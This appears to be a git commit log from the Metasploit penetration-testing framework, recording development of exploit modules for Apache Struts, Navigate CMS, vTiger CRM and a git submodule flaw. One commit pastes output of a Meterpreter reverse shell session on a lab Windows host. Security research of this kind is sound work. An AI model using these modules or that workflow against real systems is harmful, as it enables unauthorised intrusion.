Tim W
290d4428c1
create git mixin
2018-10-18 11:31:31 +08:00
Tim W
063e477ff2
git submodule url exec (CVE-2018-17456)
2018-10-18 11:02:28 +08:00
William Vu
5b14d94957
Land #10671, struts2_namespace_ognl updates
There are still some outstanding concerns, but I want to unblock this.
2018-10-12 11:08:33 -05:00
William Vu
2989507b85
Copy check for data_header to avoid crash
Variable was used but out of scope.
2018-10-12 11:06:26 -05:00
Alex Gonzalez
1da99c8bd1
Fixed syntax errors
Corrected redundant returns and indentation errors
2018-10-11 10:01:47 -04:00
Alex Gonzalez
86f7c270c6
Fixed stylistic and syntax errors
2018-10-11 09:19:35 -04:00
Alex Gonzalez
0f3917f540
Fixed syntax errors
2018-10-10 13:26:49 -04:00
Alex Gonzalez
26482ee6d6
Fixed EOL spaces
2018-10-09 18:30:41 -04:00
Alex Gonzalez
9c9cd33c34
Fixed syntax errors and inconsistencies
2018-10-09 17:45:02 -04:00
Jacob Robles
8b955f8ec5
Land #10704, Navigate CMS Unauthenticated RCE
2018-10-04 06:44:21 -05:00
Jacob Robles
97729727d8
Minor modifications
2018-10-02 06:57:04 -05:00
Rob
6f5a8f8f42
Fix outdated metadata
2018-10-01 18:59:09 +01:00
asoto-r7
e4256f4595
Make ENABLE_STATIC an OptBool, as I should have done in the first place
2018-09-27 17:54:22 -05:00
Pyriphlegethon
342cfe4199
Refactor again
2018-09-27 12:38:05 +02:00
Pyriphlegethon
82b1f40925
Add cleanup code
2018-09-27 11:17:53 +02:00
Pyriphlegethon
2b86297138
Refactor
2018-09-27 11:16:54 +02:00
Pyriphlegethon
f55483d17d
Fix incorrect session_id extraction
2018-09-27 11:07:43 +02:00
Pyriphlegethon
f882c3aec2
Add Navigate CMS Unauthenticated Remote Code Execution
2018-09-26 21:39:15 +02:00
asoto-r7
fd8ad6f4d8
struts2_namespace_ognl: Added verbose messages for errors with Tomcat >= 7.0.88
2018-09-18 15:26:28 -05:00
asoto-r7
4933f47ac5
struts2_namespace_ognl: Remove debugging code
2018-09-18 14:46:41 -05:00
asoto-r7
a9e6257891
struts2_namespace_ognl multishot OGNL payloads for Windows Meterpreter support
2018-09-18 14:27:47 -05:00
Brent Cook
6126a627cc
Land #10570, AKA Metadata Refactor
2018-09-17 22:29:20 -05:00
Erin Bleiweiss
011c25ed59
Merge changes from master (ghostscript)
2018-09-17 13:57:28 -05:00
William Vu
4c036e70c1
Fix http://seclists.org links to https://
I have no idea how this happened in my own code. I was seeing https://.
2018-09-15 18:54:45 -05:00
Wei Chen
718aaca0f4
Land #10546, Add Apache Struts exploit: CVE-2018-11776
2018-09-07 14:54:23 -05:00
Wei Chen
bd50e00ccc
Make some small changes:
Changes made:
* DisclosureDate
* Privileged to false
* Remove gsub for ';'
* Set cmd/unix/generic as the default payload for ARCH_CMD (linux)
2018-09-07 14:48:33 -05:00
asoto-r7
99ca6cef49
Quote-block cleanup and improved error handling
2018-09-07 11:43:04 -05:00
asoto-r7
3671f8f6b0
Handling for Tomcat namespace issues, 'allowStaticMethodAccess' settings, and payload output
Depending on the configuration of the Tomcat server, `allowStaticMethodAccess` may already be set. We now try to detect this as part of `profile_target`. But that check might fail. If so, we'll try our best and let the user control whether we prepend OGNL to enable `allowStaticMethodAccess` via the 'ENABLE_OGNL' option.
Additionally, sometimes enabling `allowStaticMethodAccess` will cause the OGNL query to fail.
Additionally additionally, some Tomcat configurations won't provide output from the payload. We'll detect that the payload ran successfully, but tell the user there was no output.
2018-09-06 17:56:42 -05:00
asoto-r7
7eb06b4592
Address travis errors: Updated metadata and target OS logic
2018-09-06 12:43:56 -05:00
asoto-r7
cb16f812ec
struts2_namespace_ognl updates from code review
Thanks to @wvu, @firefart, and @wchen!
2018-09-06 11:50:57 -05:00
Erin Bleiweiss
eb17d9b198
Refactor AKA references for modules
2018-08-31 16:56:05 -05:00
asoto-r7
8fe8bf62e3
Renamed to match existing struts2_content_type_ognl and improved comments
2018-08-31 13:48:22 -05:00
asoto-r7
35022d8332
Added payload upload+execution and OGNL-specific URI encoding
2018-08-31 13:39:42 -05:00
William Vu
7c7f63df45
Fix missing normalize_uri in struts2_rest_xstream
I missed this one previously. May not be necessary but nice to have.
2018-08-30 15:56:43 -05:00
asoto-r7
b373dcc5d4
First draft of module and documentation for struts_namespace_rce against CVE-2018-11776
2018-08-28 16:53:26 -05:00
William Vu
f6b868bac2
Prefer regex for target check in exploit method
This is how I initially wrote it out, and I think I like it better.
Obviously we'll still check individual symbols in execute_command, since
some of the matching is disjoint.
2018-08-28 15:56:45 -05:00
William Vu
3dec79da23
Add Windows ARCH_CMD target and refactor again
Must have been an oversight that I didn't add the target.
2018-08-28 15:03:41 -05:00
William Vu
7d21c2094e
Improve PSH target and refactor check code
2018-08-27 20:18:35 -05:00
William Vu
df5f4caaae
Uncomment PSH target in struts2_rest_xstream
I'm full of shit. It works.
msf5 exploit(multi/http/struts2_rest_xstream) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500
meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
Brent Cook
47ca6c6a14
Land #10527, Fix msftdiy EDB link check, enable HTTPS
2018-08-27 10:49:20 -05:00
Jacob Robles
79b3e4564a
Land #10487, add php5 session file target
2018-08-27 06:22:28 -05:00
Brendan Coles
9725e90ba7
Fix msftdiy EDB link check
2018-08-26 04:18:38 +00:00
Jacob Robles
7f3824b067
Additional path for Linux target
2018-08-24 07:18:24 -05:00
Wei Chen
3d0d8f7773
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
Chirag Jariwala
b9809d9435
Added support for php5 as target
location of the session file in php5 is /var/lib/php5/sess_file
2018-08-20 03:47:04 +05:30
Wei Chen
d9fc99ec4a
Correct false negative post_auth? status
2018-08-09 23:34:03 -05:00
Wei Chen
6223685c37
Update auth requirement for json metadata
2018-08-07 16:42:00 -05:00
Jacob Robles
6c11d5800f
Register files on same line
2018-07-31 10:03:59 -05:00
Jacob Robles
569ddd9d59
Remove files from application
2018-07-31 09:47:39 -05:00
Jacob Robles
952ab801e8
Land #10060, vTiger CRM v6.3.0 Upload RCE
2018-07-30 12:32:24 -05:00